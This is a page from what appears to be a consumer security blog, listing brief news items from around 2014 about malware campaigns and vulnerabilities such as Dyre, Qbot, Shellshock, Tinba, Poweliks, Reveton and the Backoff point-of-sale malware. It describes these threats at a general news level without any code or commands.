Internet threat news
Recently, hackers released a variant of the Dyre banking Trojan designed to target users of the popular sales platform Salesforce.com. In early September, Salesforce notified customers that they may be targeted by Dyre (also known as Dyreza) — a key logger designed to harvest user login credentials. More traditional Dyre campaigns target large financial institutions, but the variant affecting Salesforce customers was attached to an email that installed Dyre once opened.
Russian hackers, operating under the name of the “Sandworm team”, are targeting government leaders and institutions including the North Atlantic Treaty Organization (NATO), European Union and Ukrainian governments and academic targets in the United States. At least one U.S. academic was specifically targeted for his work and focus on Ukrainian issues. Based on recent analysis by security firm iSight, a company that has been watching Sandworm since last year, this cyber espionage campaign has been slipping into Windows computers for over five years — specifically extracting information pertaining to intelligence and diplomatic affairs in Ukraine.
Security experts recently uncovered a new and extremely dangerous botnet that has already infected an estimated 500,000 computers worldwide. Known as Qbot or Qakbot, this new botnet is designed to sniff packets related to online banking transactions. At the time of this writing, over 800,000 unique online financial transactions have been intercepted. Most of these are from at least five major United States banks, although security firm Proofpoint (the firm responsible for discovering Qbot) states that many large European banks are also being actively targeted. According to reports, Qbot started when a group of Russian cybercriminals obtained administrative login credentials for Wordpress sites via an underground marketplace. Malware was uploaded to these sites so visitors would become victim to the ever-so-popular drive-by download.
You may have heard about a recent security scare that many websites have been quick to compare to Heartbleed and other serious vulnerabilities that have been recently discovered. In case you are unfamiliar, Shellshock is a vulnerability affecting Linux/Unix and some OSX (Apple) computers whereby a hacker can remotely execute code from the terminal (known as Bash). This vulnerability is due to a coding oversight that allows certain variables to be read as commands by the terminal. Although the use of Linux for home computers is still relatively limited, Shellshock could spell big trouble for many large corporations that rely on Linux or Unix-based systems for many backend functions. This blog decided not to cover Shellshock previously because it does not affect Windows machines. However, security researchers have recently discovered that Windows has many similar vulnerabilities that could allow for remote code execution via the Windows terminal.
Police officers exist to protect us, right? So it shouldn’t come as much of a surprise when the local police department offers us - citizens of the United States - a tool designed to protect our children from the dangerous place colloquially known as the Internet. Unfortunately, it appears local police departments would rather follow in the footsteps of the NSA and spy on everything we do online, illicit or not. ComputerCOP is a free Internet security software offered by law enforcement agencies around the country. This software is purportedly designed as a way for parents to keep an eye on what their children are doing online.
A Greek security researcher recently uncovered a new malware campaign that takes advantage of two well-known programs to avoid detection by most antivirus solutions while functioning as a keylogger capable of stealing all keystrokes made on an infected machine. These keystrokes — which often include sensitive personal and financial data — are then sent discreetly to the cybercriminals behind the attack. This new threat is comprised of two unique pieces of software. The first is a well-documented keylogging program known as Limitless Keylogger.
A Distributed Denial of Service (DDoS) attack is nothing new. In fact, this technique has been used by hackers practically since the Internet came online and continues to be an effective way to disrupt network services. DDoS attacks have another purpose as well. The Gameover Zeus botnet was often installed on networks during massive DDoS attacks used to distract IT security personnel from the malware infection. By the time the DDoS attack would subside, Gameover was already installed and it could be days before the breach was even noticed. Perhaps the biggest drawback (from a hacker's perspective) to using a DDoS attack is that most common techniques used (such as synchronize (SYN) attacks, User Datagram Protocol (UDP) attacks, and GET request flood attacks) are extremely well-documented and easy to block once a network is properly configured.
As more devices become Internet-ready – luring consumers with the dream of an automated lifestyle – new malware is being designed to take advantage of this technology trend. Smart thermostats and other appliances have even been used in large-scale Distributed Denial of Service (DDoS) attacks. In fact, one such attack was recently recorded at 215 Gbps and over 150 million packets per second. This DDoS attack was performed using a new malware toolkit known as Spike. Security experts have watched as the Spike Toolkit was ported from Windows, to Linux and even ARM-based platforms.
Twitch is a popular video game streaming site recently acquired by Amazon. According to Finnish security firm F-Secure, a rogue Twitch account is being used to launch a malware campaign targeting users of a popular game distribution platform known as Steam. The malware, called Eskimo, operates by sending automated spam messages from a Twitch account using the service's built-in chat function. Users receiving the rogue message are asked to click on a link which supposedly allows them to enter a raffle for sought-after items in Counter Strike: Global Offensive; a popular game distributed through Steam.
A banking Trojan known as Tiny Banker, or Tinba, was first discovered over two years ago when it infected thousands of computers in Turkey. The malware is extremely small at only 20 Kb (hence the name) and is capable of injecting rogue HTML fields into websites when it has detected that the victim has navigated to an online banking site. The injected HTML fields typically ask users for sensitive personal and financial information – information not usually required on most online banking portals. Recently, anti-virus and security security company Avast analyzed a new version of Tiny Banker that appears to target customers in the United States. Specifically, Tinba is now programmed to target major U.S. banks including Wells Fargo and Bank of America.
A couple months ago this blog reported that the Gameover Zeus botnet — a notoriously dangerous Trojan responsible for distributing Cryptolocker ransomware — was shut down by an international task force code named Operation Tovar. This task force included members of the U.S. Department of Justice, multiple law enforcement offices, foreign government agencies and private security firms from around the world. The goal was to destroy the Command and Control servers responsible for sending instructions to millions of infected PCs and for the most part, the operation was considered a success.
Recently, this blog covered the alarming increase in fileless malware such as Poweliks. This dangerous new type of malware is undetectable by most modern antivirus solutions because the malware does not actually install any files to the computer hard drive (installing files is a red flag for most antivirus programs). Fileless malware isn’t exactly new but the problem has always been that the malware disappears after the computer is rebooted. Newer variations like Poweliks have figured out a way to load themselves via system registry entries every time the machine is booted resulting in persistent fileless malware that is almost impossible to detect and just as difficult to remove.
Reveton is an infamous malware strain part of the increasingly popular ransomware subset designed to lock computers or encrypt valuable data as a way to extort money from victims. Now that security researchers have discovered a way to decrypt one of the most notorious ransomware variants to date (Cryptolocker), it seems that hackers haven’t wasted any time looking for new ways to leverage old malware for new purposes. Unlike Cryptolocker, the original version of Reveton simply locked a victim’s computer to a specific splash screen and demanded payment to unlock the computer. Recently, however, security professionals have identified a new version of Reveton complete with two powerful password stealing programs making this malware variant even more dangerous than before.
Point-of-sale (POS) systems complete with credit card processing capabilities are everywhere from the gas pump to the local convenience store to your favorite clothing boutique. Unfortunately, hackers have begun targeting these POS systems around the world with specialized malware designed to extract personal payment information from thousands (and often millions) of people before the company affected by the malware even knows what happened. A recent Secret Service bulletin describes one of these malware variants known as Backoff. The announcement claims that at least seven POS vendors have confirmed having multiple clients affected by Backoff.
Page 1 of 10<< Start < Prev 1 2 3 4 5 6 7 8 9 10 Next > End >>